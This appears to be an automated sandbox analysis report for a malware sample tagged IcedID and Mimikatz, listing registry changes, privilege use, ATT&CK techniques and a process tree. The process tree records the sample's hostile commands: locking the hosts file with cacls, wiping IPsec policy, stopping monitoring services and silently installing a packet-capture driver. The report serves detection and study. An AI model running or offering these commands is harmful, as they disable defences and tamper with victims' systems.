cmd.exenetsh.exenetsh.exexohudmc.execacls.exenet.exeschtasks.exesc.exesc.exenet1.execmd.exenet.execmd.exenet1.exenet.execmd.execmd.exenet.exenet.exenet1.execmd.exenetsh.exenetsh.exenet1.exenetsh.execmd.execmd.execmd.execmd.exesc.exePING.EXEnet1.exenet1.exekzurgcimy.execmd.exenetsh.execmd.exenet1.exensgwibn.exeasysoo.execmd.execacls.exenetsh.execmd.exenetsh.exenet.exenet.execacls.exenet.exeschtasks.exenetsh.execmd.exenetsh.execmd.execmd.execmd.exewpcap.execmd.exenet1.exenetsh.exenet1.exe2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.execmd.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kzurgcimy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nsgwibn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language asysoo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 4068 cmd.exe 1200 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\guiyywyg\nsgwibn.exe nsis_installer_2 C:\Windows\iguwtuflb\umnwwtqyn\wpcap.exe nsis_installer_1 C:\Windows\iguwtuflb\umnwwtqyn\wpcap.exe nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
nsgwibn.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" nsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" nsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" nsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" nsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ nsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe -
Modifies registry class 14 IoCs
Processes:
nsgwibn.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" nsgwibn.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 4612 schtasks.exe 4796 schtasks.exe 3408 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
nsgwibn.exepid process 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exepid process 436 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exensgwibn.exensgwibn.exevfshost.exeyumgbbwyg.exeierigg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exedescription pid process Token: SeDebugPrivilege 436 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3732 nsgwibn.exe Token: SeDebugPrivilege 2108 nsgwibn.exe Token: SeDebugPrivilege 680 vfshost.exe Token: SeDebugPrivilege 4856 yumgbbwyg.exe Token: SeLockMemoryPrivilege 5096 ierigg.exe Token: SeLockMemoryPrivilege 5096 ierigg.exe Token: SeDebugPrivilege 4844 yumgbbwyg.exe Token: SeDebugPrivilege 2668 yumgbbwyg.exe Token: SeDebugPrivilege 4552 yumgbbwyg.exe Token: SeDebugPrivilege 380 yumgbbwyg.exe Token: SeDebugPrivilege 2528 yumgbbwyg.exe Token: SeDebugPrivilege 724 yumgbbwyg.exe Token: SeDebugPrivilege 3700 yumgbbwyg.exe Token: SeDebugPrivilege 3444 yumgbbwyg.exe Token: SeDebugPrivilege 2032 yumgbbwyg.exe Token: SeDebugPrivilege 3848 yumgbbwyg.exe Token: SeDebugPrivilege 2220 yumgbbwyg.exe Token: SeDebugPrivilege 5108 yumgbbwyg.exe Token: SeDebugPrivilege 4984 yumgbbwyg.exe Token: SeDebugPrivilege 4128 yumgbbwyg.exe Token: SeDebugPrivilege 1324 yumgbbwyg.exe Token: SeDebugPrivilege 3444 yumgbbwyg.exe Token: SeDebugPrivilege 3420 yumgbbwyg.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exensgwibn.exensgwibn.exexohudmc.exeasysoo.exensgwibn.exensgwibn.exepid process 436 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe 436 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe 3732 nsgwibn.exe 3732 nsgwibn.exe 2108 nsgwibn.exe 2108 nsgwibn.exe 4068 xohudmc.exe 3064 asysoo.exe 3412 nsgwibn.exe 3412 nsgwibn.exe 3356 nsgwibn.exe 3356 nsgwibn.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.execmd.exensgwibn.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 436 wrote to memory of 4068 436 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe cmd.exe PID 436 wrote to memory of 4068 436 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe cmd.exe PID 436 wrote to memory of 4068 436 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe cmd.exe PID 4068 wrote to memory of 1200 4068 cmd.exe PING.EXE PID 4068 wrote to memory of 1200 4068 cmd.exe PING.EXE PID 4068 wrote to memory of 1200 4068 cmd.exe PING.EXE PID 4068 wrote to memory of 3732 4068 cmd.exe nsgwibn.exe PID 4068 wrote to memory of 3732 4068 cmd.exe nsgwibn.exe PID 4068 wrote to memory of 3732 4068 cmd.exe nsgwibn.exe PID 2108 wrote to memory of 2240 2108 nsgwibn.exe cmd.exe PID 2108 wrote to memory of 2240 2108 nsgwibn.exe cmd.exe PID 2108 wrote to memory of 2240 2108 nsgwibn.exe cmd.exe PID 2240 wrote to memory of 4056 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 4056 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 4056 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 628 2240 cmd.exe cacls.exe PID 2240 wrote to memory of 628 2240 cmd.exe cacls.exe PID 2240 wrote to memory of 628 2240 cmd.exe cacls.exe PID 2240 wrote to memory of 1572 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 1572 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 1572 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 5048 2240 cmd.exe cacls.exe PID 2240 wrote to memory of 5048 2240 cmd.exe cacls.exe PID 2240 wrote to memory of 5048 2240 cmd.exe cacls.exe PID 2240 wrote to memory of 3480 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 3480 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 3480 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 1548 2240 cmd.exe cacls.exe PID 2240 wrote to memory of 1548 2240 cmd.exe cacls.exe PID 2240 wrote to memory of 1548 2240 cmd.exe cacls.exe PID 2108 wrote to memory of 4788 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 4788 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 4788 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 2424 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 2424 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 2424 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 824 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 824 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 824 2108 nsgwibn.exe netsh.exe PID 2108 wrote to memory of 4856 2108 nsgwibn.exe cmd.exe PID 2108 wrote to memory of 4856 2108 nsgwibn.exe cmd.exe PID 2108 wrote to memory of 4856 2108 nsgwibn.exe cmd.exe PID 4856 wrote to memory of 1040 4856 cmd.exe wpcap.exe PID 4856 wrote to memory of 1040 4856 cmd.exe wpcap.exe PID 4856 wrote to memory of 1040 4856 cmd.exe wpcap.exe PID 1040 wrote to memory of 4808 1040 wpcap.exe net.exe PID 1040 wrote to memory of 4808 1040 wpcap.exe net.exe PID 1040 wrote to memory of 4808 1040 wpcap.exe net.exe PID 4808 wrote to memory of 4492 4808 net.exe net1.exe PID 4808 wrote to memory of 4492 4808 net.exe net1.exe PID 4808 wrote to memory of 4492 4808 net.exe net1.exe PID 1040 wrote to memory of 3244 1040 wpcap.exe net.exe PID 1040 wrote to memory of 3244 1040 wpcap.exe net.exe PID 1040 wrote to memory of 3244 1040 wpcap.exe net.exe PID 3244 wrote to memory of 3408 3244 net.exe net1.exe PID 3244 wrote to memory of 3408 3244 net.exe net1.exe PID 3244 wrote to memory of 3408 3244 net.exe net1.exe PID 1040 wrote to memory of 2828 1040 wpcap.exe net.exe PID 1040 wrote to memory of 2828 1040 wpcap.exe net.exe PID 1040 wrote to memory of 2828 1040 wpcap.exe net.exe PID 2828 wrote to memory of 2688 2828 net.exe net1.exe PID 2828 wrote to memory of 2688 2828 net.exe net1.exe PID 2828 wrote to memory of 2688 2828 net.exe net1.exe PID 1040 wrote to memory of 1456 1040 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1396
-
C:\Windows\TEMP\ybymbrggy\ierigg.exe"C:\Windows\TEMP\ybymbrggy\ierigg.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\guiyywyg\nsgwibn.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1200
-
-
C:\Windows\guiyywyg\nsgwibn.exeC:\Windows\guiyywyg\nsgwibn.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3732
-
-
-
C:\Windows\guiyywyg\nsgwibn.exeC:\Windows\guiyywyg\nsgwibn.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4056
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:5048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3480
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:1548
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4788
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2424
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iguwtuflb\umnwwtqyn\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\iguwtuflb\umnwwtqyn\wpcap.exeC:\Windows\iguwtuflb\umnwwtqyn\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3408
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2688
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1456 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4460
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3256 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
